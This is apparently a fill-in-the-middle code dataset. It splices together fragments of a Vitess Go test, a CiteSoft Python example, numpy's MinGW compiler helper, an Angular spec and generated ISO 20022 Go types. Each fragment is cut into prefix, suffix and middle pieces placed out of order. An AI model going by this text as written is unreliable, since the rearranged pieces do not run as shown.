// Simulate an error that should *not* trigger a rollback:
// vtrpcpb.ErrorCode_INTEGRITY_ERROR case.
session, err = rpcVTGate.Begin(context.Background(), false)
if err != nil {
t.Fatalf("cannot start a transaction: %v", err)
}
_, err = rpcVTGate.Execute(context.Background(),
"select id from t1",
nil,
"",
topodatapb.TabletType_MASTER,
session,
false,
nil)
if err != nil {
t.Fatalf("want nil, got %v", err)
}
if sbc.RollbackCount.Get() != 0 {
t.Errorf("want 0, got %d", sbc.RollbackCount.Get())
}
sbc.MustFailIntegrityError = 20
_, err = rpcVTGate.Execute(context.Background(),
"select id from t1",
nil,
"",
topodatapb.TabletType_MASTER,
session,
false,
nil)
if err == nil {
t.Fatalf("want error but got nil")
}
if sbc.RollbackCount.Get() != 0 {
t.Errorf("want 0, got %d", sbc.RollbackCount.Get())
}
sbc.MustFailIntegrityError = 0
} | },
},
topodatapb.TabletType_MASTER, |
MathExample.py | import sys
import math
try:
import CiteSoft
except:
import os #The below lines are to allow CiteSoftLocal to be called regardless of user's working directory.
lenOfFileName = len(os.path.basename(__file__)) #This is the name of **this** file.
absPathWithoutFileName = os.path.abspath(__file__)[0:-1*lenOfFileName]
sys.path.append(absPathWithoutFileName)
import CiteSoftLocal as CiteSoft
#Here CiteSoft is used with an example module called "MathExample"
#Note that the unique_id should be something truly unique (no other software would use it).
#Typically, unique_id is a DOI or a URL.
#The author field is typically a list object with names as strings, but can also just be a single string.
#Note that there is a function called sqrt which uses the python math module, and uses a *different* citation.
software_name = "CiteSoft Math Example"
version = "1.0.0"
MathExample_unique_id = "https://github.com/AdityaSavara/CiteSoft_py/blob/master/MathExample.py"
kwargs = {"version": version, "author": ["Aditya Savara", "CPH"], "url": "https://github.com/AdityaSavara/CiteSoft_py/blob/master/MathExample.py"}
#The below line will cause this module's citation to be exported any time the module is imported.
#The 'write_immediately = True' causes the checkpoint to be written at the time of export rather than stored.
CiteSoft.import_cite(unique_id=MathExample_unique_id, software_name="MathLib Example", write_immediately=True, **kwargs)
@CiteSoft.function_call_cite(unique_id=MathExample_unique_id, software_name="CiteSoft Math Example", **kwargs)
def add(num1, num2):
return num1 + num2
| @CiteSoft.function_call_cite(unique_id=MathExample_unique_id, software_name="CiteSoft Math Example", **kwargs)
def multiply(num1, num2):
return num1 * num2
@CiteSoft.function_call_cite(unique_id=MathExample_unique_id, software_name="CiteSoft Math Example", **kwargs)
def divide(num1, num2):
return num1 / num2
@CiteSoft.after_call_compile_consolidated_log() #This will cause the consolidated log to be compiled after the mean function is called. #Note that we put it after the function_call_cite so that it is a wrapper around that wrapper and occurs second.
@CiteSoft.function_call_cite(unique_id=MathExample_unique_id, software_name="MathLib Example", **kwargs)
def mean(list_of_num):
result = 0
for num in list_of_num:
result = add(result, num)
result = divide(result, len(list_of_num))
return result
math_unique_id = "https://docs.python.org/3/library/math.html"
math_software_name = "The Python Library Reference: Mathematical functions"
math_version = str(sys.version).split("|")[0] #This is the python version.
math_kwargs = {"version": math_version, "author": "Van Rossum, Guido", "cite": "Van Rossum, G. (2020). The Python Library Reference, release 3.8.2. Python Software Foundation.", "url": "https://docs.python.org/3/library/math.html"}
@CiteSoft.function_call_cite(unique_id=math_unique_id, software_name=math_software_name, **math_kwargs)
def sqrt(num):
return math.sqrt(num)
@CiteSoft.function_call_cite(MathExample_unique_id, software_name, **kwargs)
def sqr(num):
return multiply(num, num)
@CiteSoft.function_call_cite(MathExample_unique_id, software_name, **kwargs)
def sample_variance(list_of_num):
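# Unbiased sample variance: sum((x - mean)^2) / (n - 1).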
meanVal = mean(list_of_num)
result = 0
for num in list_of_num:
result = add(result, sqr(subtract(num, meanVal)))
result = divide(result, (len(list_of_num) - 1))
return result
@CiteSoft.function_call_cite(MathExample_unique_id, software_name, **kwargs)
def std_dev(list_of_num):
return sqrt(sample_variance(list_of_num))
@CiteSoft.after_call_compile_consolidated_log() #This will cause the consolidated log to be compiled after cite_me() is called. #Note that we put it after the function_call_cite so that it is a wrapper around that wrapper and occurs second.
@CiteSoft.function_call_cite(MathExample_unique_id, software_name, **kwargs)
def cite_me(): #This is an example of how a package-creating dev could provide a function that downstream devs relying on the package can call at the very end of doing everything, so that no direct calls to CiteSoft need to occur during their runtime.
pass
#note that the above lines of code simply add to the file CiteSoftwareCheckPoints
#if one wants to create a consolidated log that removes duplicates, one can call a CiteSoft function
#This is considered appropriate to do at the end of a complicated program, but is not necessary.
#It would also have been possible to use decorators like @CiteSoft.after_call_compile_checkpoints_log or @CiteSoft.after_call_compile_consolidated_log on any of the above functions. Note that chained/stacked decorators are applied in "first in, last out" order, since they are wrappers on wrappers; so if a function has both @CiteSoft.function_call_cite and @CiteSoft.after_call_compile_consolidated_log, the @CiteSoft.function_call_cite should come second.
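#For illustration, a minimal (hypothetical) driver script using this module:
#
# import MathExample
# print(MathExample.mean([1, 2, 3])) # logs citations; the consolidated log is compiled afterwards
# print(MathExample.std_dev([1, 2, 3])) # sqrt() additionally logs the python math citation
# MathExample.export_citation_checkpoints() # optional, via the helper defined below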
def export_citation_checkpoints(filepath=""):
if filepath is not "":
CiteSoft.compile_checkpoints_log(filepath)
else:
CiteSoft.compile_checkpoints_log() | @CiteSoft.function_call_cite(unique_id=MathExample_unique_id, software_name="CiteSoft Math Example", **kwargs)
def subtract(num1, num2):
return num1 - num2
|
mingw32ccompiler.py | """
Support code for building Python extensions on Windows.
# NT stuff
# 1. Make sure libpython<version>.a exists for gcc. If not, build it.
# 2. Force windows to use gcc (we're struggling with MSVC and g77 support)
# 3. Force windows to use g77
"""
from __future__ import division, absolute_import, print_function
import os
import sys
import subprocess
import re
# Overwrite certain distutils.ccompiler functions:
import numpy.distutils.ccompiler
if sys.version_info[0] < 3:
from . import log
else:
from numpy.distutils import log
# NT stuff
# 1. Make sure libpython<version>.a exists for gcc. If not, build it.
# 2. Force windows to use gcc (we're struggling with MSVC and g77 support)
# --> this is done in numpy/distutils/ccompiler.py
# 3. Force windows to use g77
import distutils.cygwinccompiler
from distutils.version import StrictVersion
from numpy.distutils.ccompiler import gen_preprocess_options, gen_lib_options
from distutils.unixccompiler import UnixCCompiler
from distutils.msvccompiler import get_build_version as get_build_msvc_version
from distutils.errors import (DistutilsExecError, CompileError,
UnknownFileError)
from numpy.distutils.misc_util import (msvc_runtime_library,
get_build_architecture)
# Useful to generate table of symbols from a dll
_START = re.compile(r'\[Ordinal/Name Pointer\] Table')
_TABLE = re.compile(r'^\s+\[([\s*[0-9]*)\] ([a-zA-Z0-9_]*)')
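# For illustration, the objdump output these patterns target looks roughly
# like this (the symbol names here are hypothetical):
#
#   [Ordinal/Name Pointer] Table
#       [   0] PyObject_GetAttr
#       [   1] PyObject_SetAttr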
# the same as cygwin plus some additional parameters
class Mingw32CCompiler(distutils.cygwinccompiler.CygwinCCompiler):
""" A modified MingW32 compiler compatible with an MSVC built Python.
"""
compiler_type = 'mingw32'
def __init__ (self,
verbose=0,
dry_run=0,
force=0):
distutils.cygwinccompiler.CygwinCCompiler.__init__ (self, verbose,
dry_run, force)
# we need to support gcc 3.2, which doesn't match the standard
# get_versions method's regex
if self.gcc_version is None:
import re
p = subprocess.Popen(['gcc', '-dumpversion'], shell=True,
stdout=subprocess.PIPE)
out_string = p.stdout.read()
p.stdout.close()
result = re.search(r'(\d+\.\d+)', out_string.decode())
if result:
self.gcc_version = StrictVersion(result.group(1))
# A real mingw32 doesn't need to specify a different entry point,
# but cygwin 2.91.57 in no-cygwin-mode needs it.
if self.gcc_version <= "2.91.57":
entry_point = '--entry _DllMain@12'
else:
entry_point = ''
if self.linker_dll == 'dllwrap':
# Commented out '--driver-name g++' part that fixes weird
# g++.exe: g++: No such file or directory
# error (mingw 1.0 in Enthon24 tree, gcc-3.4.5).
# If the --driver-name part is required for some environment
# then make the inclusion of this part specific to that
# environment.
self.linker = 'dllwrap' # --driver-name g++'
elif self.linker_dll == 'gcc':
self.linker = 'g++'
p = subprocess.Popen(['gcc', '--version'], shell=True,
stdout=subprocess.PIPE)
out_string = p.stdout.read()
p.stdout.close()
# Before build with MinGW-W64 generate the python import library
# with gendef and dlltool according to the MingW-W64 FAQ.
# Use the MinGW-W64 provided msvc runtime import libraries.
# Don't call build_import_library() and build_msvcr_library.
if 'MinGW-W64' not in str(out_string):
# **changes: eric jones 4/11/01
# 1. Check for import library on Windows. Build if it doesn't
# exist.
build_import_library()
# Check for custom msvc runtime library on Windows. Build if it
# doesn't exist.
msvcr_success = build_msvcr_library()
msvcr_dbg_success = build_msvcr_library(debug=True)
if msvcr_success or msvcr_dbg_success:
# add preprocessor statement for using customized msvcr lib
self.define_macro('NPY_MINGW_USE_CUSTOM_MSVCR')
# Define the MSVC version as hint for MinGW
msvcr_version = '0x%03i0' % int(msvc_runtime_library().lstrip('msvcr'))
self.define_macro('__MSVCRT_VERSION__', msvcr_version)
# MS_WIN64 should be defined when building for amd64 on windows,
# but python headers define it only for MS compilers, which has all
# kind of bad consequences, like using Py_ModuleInit4 instead of
# Py_ModuleInit4_64, etc... So we add it here
if get_build_architecture() == 'AMD64':
if self.gcc_version < "4.0":
self.set_executables(
compiler='gcc -g -DDEBUG -DMS_WIN64 -mno-cygwin -O0 -Wall',
compiler_so='gcc -g -DDEBUG -DMS_WIN64 -mno-cygwin -O0'
' -Wall -Wstrict-prototypes',
linker_exe='gcc -g -mno-cygwin',
linker_so='gcc -g -mno-cygwin -shared')
else:
# gcc-4 series releases do not support -mno-cygwin option
self.set_executables(
compiler='gcc -march=x86-64 -mtune=generic -DMS_WIN64'
' -O2 -msse2 -Wall',
compiler_so='gcc -march=x86-64 -mtune=generic -DMS_WIN64'
' -O2 -msse2 -Wall -Wstrict-prototypes',
linker_exe='gcc',
linker_so='gcc -shared -Wl,-gc-sections -Wl,-s')
else:
if self.gcc_version <= "3.0.0":
self.set_executables(
compiler='gcc -mno-cygwin -O2 -w',
compiler_so='gcc -mno-cygwin -mdll -O2 -w'
' -Wstrict-prototypes',
linker_exe='g++ -mno-cygwin',
linker_so='%s -mno-cygwin -mdll -static %s' %
(self.linker, entry_point))
elif self.gcc_version < "4.0":
self.set_executables(
compiler='gcc -mno-cygwin -O2 -Wall',
compiler_so='gcc -mno-cygwin -O2 -Wall'
' -Wstrict-prototypes',
linker_exe='g++ -mno-cygwin',
linker_so='g++ -mno-cygwin -shared')
else:
# gcc-4 series releases do not support -mno-cygwin option i686
# build needs '-mincoming-stack-boundary=2' due to ABI
# incompatibility to Win32 ABI
self.set_executables(
compiler='gcc -O2 -march=core2 -mtune=generic'
' -mfpmath=sse -msse2'
' -mincoming-stack-boundary=2 -Wall',
compiler_so='gcc -O2 -march=core2 -mtune=generic'
' -mfpmath=sse -msse2'
' -mincoming-stack-boundary=2 -Wall'
' -Wstrict-prototypes',
linker_exe='g++ ',
linker_so='g++ -shared -Wl,-gc-sections -Wl,-s')
# Added for python2.3 support; we can't pass it through set_executables
# because pre-2.2 would fail.
self.compiler_cxx = ['g++']
# Maybe we should also append -mthreads, but then the finished dlls
# need another dll (mingwm10.dll see Mingw32 docs) (-mthreads: Support
# thread-safe exception handling on `Mingw32')
# no additional libraries needed
#self.dll_libraries=[]
return
# __init__ ()
def link(self,
target_desc,
objects,
output_filename,
output_dir,
libraries,
library_dirs,
runtime_library_dirs,
export_symbols = None,
debug=0,
extra_preargs=None,
extra_postargs=None,
build_temp=None,
target_lang=None):
# Include the appropriate MSVC runtime library if Python was built
# with MSVC >= 7.0 (MinGW standard is msvcrt)
runtime_library = msvc_runtime_library()
if runtime_library:
if not libraries:
libraries = []
libraries.append(runtime_library)
args = (self,
target_desc,
objects,
output_filename,
output_dir,
libraries,
library_dirs,
runtime_library_dirs,
None, #export_symbols, we do this in our def-file
debug,
extra_preargs,
extra_postargs,
build_temp,
target_lang)
if self.gcc_version < "3.0.0":
func = distutils.cygwinccompiler.CygwinCCompiler.link
else:
func = UnixCCompiler.link
func(*args[:func.__code__.co_argcount])
return
def object_filenames (self,
source_filenames,
strip_dir=0,
output_dir=''):
if output_dir is None: output_dir = ''
obj_names = []
for src_name in source_filenames:
# use normcase to make sure '.rc' is really '.rc' and not '.RC'
(base, ext) = os.path.splitext (os.path.normcase(src_name))
# added these lines to strip off windows drive letters
# without it, .o files are placed next to .c files
# instead of the build directory
drv, base = os.path.splitdrive(base)
if drv:
base = base[1:]
if ext not in (self.src_extensions + ['.rc', '.res']):
raise UnknownFileError(
"unknown file type '%s' (from '%s')" % \
(ext, src_name))
if strip_dir:
base = os.path.basename (base)
if ext == '.res' or ext == '.rc':
# these need to be compiled to object files
obj_names.append (os.path.join (output_dir,
base + ext + self.obj_extension))
else:
obj_names.append (os.path.join (output_dir,
base + self.obj_extension))
return obj_names
# object_filenames ()
def find_python_dll():
maj, min, micro = [int(i) for i in sys.version_info[:3]]
dllname = 'python%d%d.dll' % (maj, min)
print("Looking for %s" % dllname)
# We can't do much here:
# - find it in python main dir
# - in system32,
# - otherwise (SxS), I don't know how to get it.
lib_dirs = []
lib_dirs.append(sys.prefix)
lib_dirs.append(os.path.join(sys.prefix, 'lib'))
try:
lib_dirs.append(os.path.join(os.environ['SYSTEMROOT'], 'system32'))
except KeyError:
pass
for d in lib_dirs:
dll = os.path.join(d, dllname)
if os.path.exists(dll):
return dll
raise ValueError("%s not found in %s" % (dllname, lib_dirs))
def dump_table(dll):
st = subprocess.Popen(["objdump.exe", "-p", dll], stdout=subprocess.PIPE)
return st.stdout.readlines()
def generate_def(dll, dfile):
"""Given a dll file location, get all its exported symbols and dump them
into the given def file.
The .def file will be overwritten"""
dump = dump_table(dll)
for i in range(len(dump)):
if _START.match(dump[i].decode()):
break
else:
raise ValueError("Symbol table not found")
syms = []
for j in range(i+1, len(dump)):
m = _TABLE.match(dump[j].decode())
if m:
syms.append((int(m.group(1).strip()), m.group(2)))
else:
break
if len(syms) == 0:
log.warn('No symbols found in %s' % dll)
d = open(dfile, 'w')
d.write('LIBRARY %s\n' % os.path.basename(dll))
d.write(';CODE PRELOAD MOVEABLE DISCARDABLE\n')
d.write(';DATA PRELOAD SINGLE\n')
d.write('\nEXPORTS\n')
for s in syms:
#d.write('@%d %s\n' % (s[0], s[1]))
d.write('%s\n' % s[1])
d.close()
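# For illustration, the .def file written above takes this shape (library
# name and symbols depend on the dll inspected; these ones are hypothetical):
#
#   LIBRARY python38.dll
#   ;CODE PRELOAD MOVEABLE DISCARDABLE
#   ;DATA PRELOAD SINGLE
#
#   EXPORTS
#   PyObject_GetAttr
#   PyObject_SetAttr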
def find_dll(dll_name):
arch = {'AMD64' : 'amd64',
'Intel' : 'x86'}[get_build_architecture()]
def _find_dll_in_winsxs(dll_name):
# Walk through the WinSxS directory to find the dll.
winsxs_path = os.path.join(os.environ['WINDIR'], 'winsxs')
if not os.path.exists(winsxs_path):
return None
for root, dirs, files in os.walk(winsxs_path):
if dll_name in files and arch in root:
return os.path.join(root, dll_name)
return None
def _find_dll_in_path(dll_name):
# First, look in the Python directory, then scan PATH for
# the given dll name.
for path in [sys.prefix] + os.environ['PATH'].split(';'):
filepath = os.path.join(path, dll_name)
if os.path.exists(filepath):
return os.path.abspath(filepath)
return _find_dll_in_winsxs(dll_name) or _find_dll_in_path(dll_name)
def build_msvcr_library(debug=False):
if os.name != 'nt':
return False
msvcr_name = msvc_runtime_library()
# Skip using a custom library for versions < MSVC 8.0
if int(msvcr_name.lstrip('msvcr')) < 80:
log.debug('Skip building msvcr library:'
' custom functionality not present')
return False
if debug:
msvcr_name += 'd'
# Skip if custom library already exists
out_name = "lib%s.a" % msvcr_name
out_file = os.path.join(sys.prefix, 'libs', out_name)
if os.path.isfile(out_file):
log.debug('Skip building msvcr library: "%s" exists' %
(out_file,))
return True
# Find the msvcr dll
msvcr_dll_name = msvcr_name + '.dll'
dll_file = find_dll(msvcr_dll_name)
if not dll_file:
log.warn('Cannot build msvcr library: "%s" not found' %
msvcr_dll_name)
return False
def_name = "lib%s.def" % msvcr_name
def_file = os.path.join(sys.prefix, 'libs', def_name)
log.info('Building msvcr library: "%s" (from %s)' \
% (out_file, dll_file))
# Generate a symbol definition file from the msvcr dll
generate_def(dll_file, def_file)
# Create a custom mingw library for the given symbol definitions
cmd = ['dlltool', '-d', def_file, '-l', out_file]
retcode = subprocess.call(cmd)
# Clean up symbol definitions
os.remove(def_file)
return (not retcode)
def build_import_library():
if os.name != 'nt':
return
arch = get_build_architecture()
if arch == 'AMD64':
return _build_import_library_amd64()
elif arch == 'Intel':
return _build_import_library_x86()
else:
raise ValueError("Unhandled arch %s" % arch)
def _build_import_library_amd64():
dll_file = find_python_dll()
out_name = "libpython%d%d.a" % tuple(sys.version_info[:2])
out_file = os.path.join(sys.prefix, 'libs', out_name)
if os.path.isfile(out_file):
log.debug('Skip building import library: "%s" exists' %
(out_file))
return
def_name = "python%d%d.def" % tuple(sys.version_info[:2])
def_file = os.path.join(sys.prefix, 'libs', def_name)
log.info('Building import library (arch=AMD64): "%s" (from %s)' %
(out_file, dll_file))
generate_def(dll_file, def_file)
cmd = ['dlltool', '-d', def_file, '-l', out_file]
subprocess.Popen(cmd)
def _build_import_library_x86():
""" Build the import libraries for Mingw32-gcc on Windows
"""
lib_name = "python%d%d.lib" % tuple(sys.version_info[:2])
lib_file = os.path.join(sys.prefix, 'libs', lib_name)
out_name = "libpython%d%d.a" % tuple(sys.version_info[:2])
out_file = os.path.join(sys.prefix, 'libs', out_name)
if not os.path.isfile(lib_file):
log.warn('Cannot build import library: "%s" not found' % (lib_file))
return
if os.path.isfile(out_file):
log.debug('Skip building import library: "%s" exists' % (out_file))
return
log.info('Building import library (ARCH=x86): "%s"' % (out_file))
from numpy.distutils import lib2def
def_name = "python%d%d.def" % tuple(sys.version_info[:2])
def_file = os.path.join(sys.prefix, 'libs', def_name)
nm_cmd = '%s %s' % (lib2def.DEFAULT_NM, lib_file)
nm_output = lib2def.getnm(nm_cmd)
dlist, flist = lib2def.parse_nm(nm_output)
lib2def.output_def(dlist, flist, lib2def.DEF_HEADER, open(def_file, 'w'))
dll_name = "python%d%d.dll" % tuple(sys.version_info[:2])
args = (dll_name, def_file, out_file)
cmd = 'dlltool --dllname %s --def %s --output-lib %s' % args
status = os.system(cmd)
# for now, fail silently
if status:
log.warn('Failed to build import library for gcc. Linking will fail.')
return
#=====================================
# Dealing with Visual Studio MANIFESTS
#=====================================
# Functions to deal with visual studio manifests. Manifest are a mechanism to
# enforce strong DLL versioning on windows, and has nothing to do with
# distutils MANIFEST. manifests are XML files with version info, and used by
# the OS loader; they are necessary when linking against a DLL not in the
# system path; in particular, official python 2.6 binary is built against the
# MS runtime 9 (the one from VS 2008), which is not available on most windows
# systems; python 2.6 installer does install it in the Win SxS (Side by side)
# directory, but this requires the manifest for this to work. This is a big
# mess, thanks MS for a wonderful system.
# XXX: ideally, we should use exactly the same version as used by python. I
# submitted a patch to get this version, but it was only included for python
# 2.6.1 and above. So for versions below, we use a "best guess".
_MSVCRVER_TO_FULLVER = {}
if sys.platform == 'win32':
try:
import msvcrt
# I took one version in my SxS directory: no idea if it is the good
# one, and we can't retrieve it from python
_MSVCRVER_TO_FULLVER['80'] = "8.0.50727.42"
_MSVCRVER_TO_FULLVER['90'] = "9.0.21022.8"
# Value from msvcrt.CRT_ASSEMBLY_VERSION under Python 3.3.0
# on Windows XP:
_MSVCRVER_TO_FULLVER['100'] = "10.0.30319.460"
if hasattr(msvcrt, "CRT_ASSEMBLY_VERSION"):
major, minor, rest = msvcrt.CRT_ASSEMBLY_VERSION.split(".", 2)
_MSVCRVER_TO_FULLVER[major + minor] = msvcrt.CRT_ASSEMBLY_VERSION
del major, minor, rest
except ImportError:
# If we are here, means python was not built with MSVC. Not sure what
# to do in that case: manifest building will fail, but it should not be
# used in that case anyway
log.warn('Cannot import msvcrt: using manifest will not be possible')
def msvc_manifest_xml(maj, min):
"""Given a major and minor version of the MSVCR, returns the
corresponding XML file."""
try:
fullver = _MSVCRVER_TO_FULLVER[str(maj * 10 + min)]
except KeyError:
raise ValueError("Version %d,%d of MSVCRT not supported yet" %
(maj, min))
# Don't be fooled, it looks like an XML, but it is not. In particular, it
# should not have any space before starting, and its size should be
# divisible by 4, most likely for alignment constraints when the xml is
# embedded in the binary...
# This template was copied directly from the python 2.6 binary (using
# strings.exe from mingw on python.exe).
template = """\
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
</requestedPrivileges>
</security>
</trustInfo>
<dependency>
<dependentAssembly>
<assemblyIdentity type="win32" name="Microsoft.VC%(maj)d%(min)d.CRT" version="%(fullver)s" processorArchitecture="*" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity>
</dependentAssembly>
</dependency>
</assembly>"""
return template % {'fullver': fullver, 'maj': maj, 'min': min}
def manifest_rc(name, type='dll'):
"""Return the rc file used to generate the res file which will be embedded
as manifest for given manifest file name, of given type ('dll' or
'exe').
Parameters
----------
name : str
name of the manifest file to embed
type : str {'dll', 'exe'}
type of the binary which will embed the manifest
"""
if type == 'dll':
rctype = 2
elif type == 'exe':
rctype = 1
else:
raise ValueError("Type %s not supported" % type)
return """\
#include "winuser.h"
%d RT_MANIFEST %s""" % (rctype, name)
def | (msver):
"""msver is the ms runtime version used for the MANIFEST."""
# check msvcr major version are the same for linking and
# embedding
msvcv = msvc_runtime_library()
if msvcv:
assert msvcv.startswith("msvcr"), msvcv
# Dealing with something like "mscvr90" or "mscvr100", the last
# last digit is the minor release, want int("9") or int("10"):
maj = int(msvcv[5:-1])
if not maj == int(msver):
raise ValueError(
"Discrepancy between linked msvcr " \
"(%d) and the one about to be embedded " \
"(%d)" % (int(msver), maj))
def configtest_name(config):
base = os.path.basename(config._gen_temp_sourcefile("yo", [], "c"))
return os.path.splitext(base)[0]
def manifest_name(config):
# Get configtest name (including suffix)
root = configtest_name(config)
exext = config.compiler.exe_extension
return root + exext + ".manifest"
def rc_name(config):
# Get configtest name (including suffix)
root = configtest_name(config)
return root + ".rc"
def generate_manifest(config):
msver = get_build_msvc_version()
if msver is not None:
if msver >= 8:
check_embedded_msvcr_match_linked(msver)
ma = int(msver)
mi = int((msver - ma) * 10)
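# e.g. msver 9.0 -> ma = 9, mi = 0; msver 8.0 -> ma = 8, mi = 0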
# Write the manifest file
manxml = msvc_manifest_xml(ma, mi)
man = open(manifest_name(config), "w")
config.temp_files.append(manifest_name(config))
man.write(manxml)
man.close()
| check_embedded_msvcr_match_linked |
app.component.spec.ts | import {TestBed, waitForAsync} from '@angular/core/testing';
import { AppComponent } from './app.component';
describe('AppComponent', () => {
beforeEach(waitForAsync(() => {
TestBed.configureTestingModule({
declarations: [
AppComponent
],
}).compileComponents();
}));
it('should create the app', () => {
const fixture = TestBed.createComponent(AppComponent);
const app = fixture.debugElement.componentInstance;
expect(app).toBeTruthy();
}); | expect(app.title).toEqual('logigator-editor');
});
it('should render title', () => {
const fixture = TestBed.createComponent(AppComponent);
fixture.detectChanges();
const compiled = fixture.debugElement.nativeElement;
expect(compiled.querySelector('.content span').textContent).toContain('logigator-editor app is running!');
});
}); |
it(`should have as title 'logigator-editor'`, () => {
const fixture = TestBed.createComponent(AppComponent);
const app = fixture.debugElement.componentInstance; |
camt.027.001.09.xsd.go | // Code generated by download. DO NOT EDIT.
package iso20022_camt_027_001_09
import (
"bytes"
"encoding/base64"
"encoding/xml"
"time"
)
type AccountIdentification4Choice struct {
IBAN IBAN2007Identifier `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 IBAN,omitempty"`
Othr GenericAccountIdentification1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Othr,omitempty"`
}
type AccountSchemeName1Choice struct {
Cd ExternalAccountIdentification1Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Cd,omitempty"`
Prtry Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Prtry,omitempty"`
}
type ActiveOrHistoricCurrencyAndAmount struct {
Value float64 `xml:",chardata"`
Ccy ActiveOrHistoricCurrencyCode `xml:"Ccy,attr"`
}
// Must match the pattern [A-Z]{3,3}
type ActiveOrHistoricCurrencyCode string
// May be one of ADDR, PBOX, HOME, BIZZ, MLTO, DLVY
type AddressType2Code string
type AddressType3Choice struct {
Cd AddressType2Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Cd,omitempty"`
Prtry GenericIdentification30 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Prtry,omitempty"`
}
type AmendmentInformationDetails14 struct {
OrgnlMndtId Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlMndtId,omitempty"`
OrgnlCdtrSchmeId PartyIdentification135 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlCdtrSchmeId,omitempty"`
OrgnlCdtrAgt BranchAndFinancialInstitutionIdentification6 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlCdtrAgt,omitempty"`
OrgnlCdtrAgtAcct CashAccount40 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlCdtrAgtAcct,omitempty"`
OrgnlDbtr PartyIdentification135 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlDbtr,omitempty"`
OrgnlDbtrAcct CashAccount40 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlDbtrAcct,omitempty"`
OrgnlDbtrAgt BranchAndFinancialInstitutionIdentification6 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlDbtrAgt,omitempty"`
OrgnlDbtrAgtAcct CashAccount40 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlDbtrAgtAcct,omitempty"`
OrgnlFnlColltnDt ISODate `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlFnlColltnDt,omitempty"`
OrgnlFrqcy Frequency36Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlFrqcy,omitempty"`
OrgnlRsn MandateSetupReason1Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlRsn,omitempty"`
OrgnlTrckgDays Exact2NumericText `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlTrckgDays,omitempty"`
}
type AmountType4Choice struct {
InstdAmt ActiveOrHistoricCurrencyAndAmount `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 InstdAmt,omitempty"`
EqvtAmt EquivalentAmount2 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 EqvtAmt,omitempty"`
}
// Must match the pattern [A-Z0-9]{4,4}[A-Z]{2,2}[A-Z0-9]{2,2}([A-Z0-9]{3,3}){0,1}
type AnyBICDec2014Identifier string
// Must match the pattern [A-Z0-9]{4,4}[A-Z]{2,2}[A-Z0-9]{2,2}([A-Z0-9]{3,3}){0,1}
type BICFIDec2014Identifier string
type BranchAndFinancialInstitutionIdentification6 struct {
FinInstnId FinancialInstitutionIdentification18 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 FinInstnId"`
BrnchId BranchData3 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 BrnchId,omitempty"`
}
type BranchData3 struct {
Id Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Id,omitempty"`
LEI LEIIdentifier `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 LEI,omitempty"`
Nm Max140Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Nm,omitempty"`
PstlAdr PostalAddress24 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 PstlAdr,omitempty"`
}
type Case5 struct {
Id Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Id"`
Cretr Party40Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Cretr"`
ReopCaseIndctn bool `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 ReopCaseIndctn,omitempty"`
}
type CaseAssignment5 struct {
Id Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Id"`
Assgnr Party40Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Assgnr"`
Assgne Party40Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Assgne"`
CreDtTm ISODateTime `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CreDtTm"`
}
type CashAccount40 struct {
Id AccountIdentification4Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Id,omitempty"`
Tp CashAccountType2Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Tp,omitempty"`
Ccy ActiveOrHistoricCurrencyCode `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Ccy,omitempty"`
Nm Max70Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Nm,omitempty"`
Prxy ProxyAccountIdentification1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Prxy,omitempty"`
}
type CashAccountType2Choice struct {
Cd ExternalCashAccountType1Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Cd,omitempty"`
Prtry Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Prtry,omitempty"`
}
type CategoryPurpose1Choice struct {
Cd ExternalCategoryPurpose1Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Cd,omitempty"`
